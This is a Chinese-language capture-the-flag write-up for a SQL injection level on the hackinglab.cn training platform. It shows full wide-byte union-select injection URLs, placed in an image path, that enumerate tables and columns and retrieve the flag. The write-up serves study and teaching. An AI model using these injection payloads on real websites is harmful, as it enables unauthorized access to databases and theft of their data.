网络信息安全攻防学习平台注入关邂逅过关攻略

独自等待 2017年5月12日01:35:57评论1,018 views字数 1209阅读4分1秒阅读模式

此关老早就有了,一直也不知道此题的考点是在哪里,放着好久没有做了,最近有朋友交流攻防平台的过关方法,终于解决了。。。

过关地址:

http://hackinglab.cn/index_4.php

邂逅介绍:

小明今天出门看见了一个漂亮的帅哥和漂亮的美女,于是他写到了他的日记本里。

http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/

过关思路:

1、最初把焦点放在了url中id参数上(页面源文件注释部分),结果发现没有注入。

2、经过朋友提示图片注入,把注入参数放在图片地址上面,而且需要使用宽字节的方式注入,如下图:

sqljpg

sqljpg2

3、从上图可以看出,确实从图片那里注入,不过图片注入还真没有听过,我觉得应该是伪静态注入,不知道大家怎么认为?

http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/cat1.jpg%bf%27%20union%20select%201,2,TABLE_NAME,4%20from%20information_schema.TABLES%20where%20table_SCHEMA=0x723034363663706c7573687561%20limit%201,1%23

得到表名:pic

http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/cat1.jpg%bf%27%20union%20select%201,2,COLUMN_NAME,4%20from%20information_schema.COLUMNS%20where%20table_NAME=0x706963%20limit%201,1%23

得到字段名:picname

http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/cat1.jpg%bf%27%20union%20select%201,2,picname,4%20from%20pic%20limit%202,1 %23

得到图片名称:flagishere_askldjfklasjdfl.jpg

4、最开始使用askldjfklasjdfl作为答案发现不行,后来经过提示,直接访问上面图片,就能得到答案了。

访问如下URL即可看到flg:

http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/flagishere_askldjfklasjdfl.jpg

sqljpgflag

感谢QQ好友:85918842(ddl)提供过关思路。。



from www.waitalone.cn.thanks for it.

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
独自等待
  • 本文由 发表于 2017年5月12日01:35:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   网络信息安全攻防学习平台注入关邂逅过关攻略https://cn-sec.com/archives/50257.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息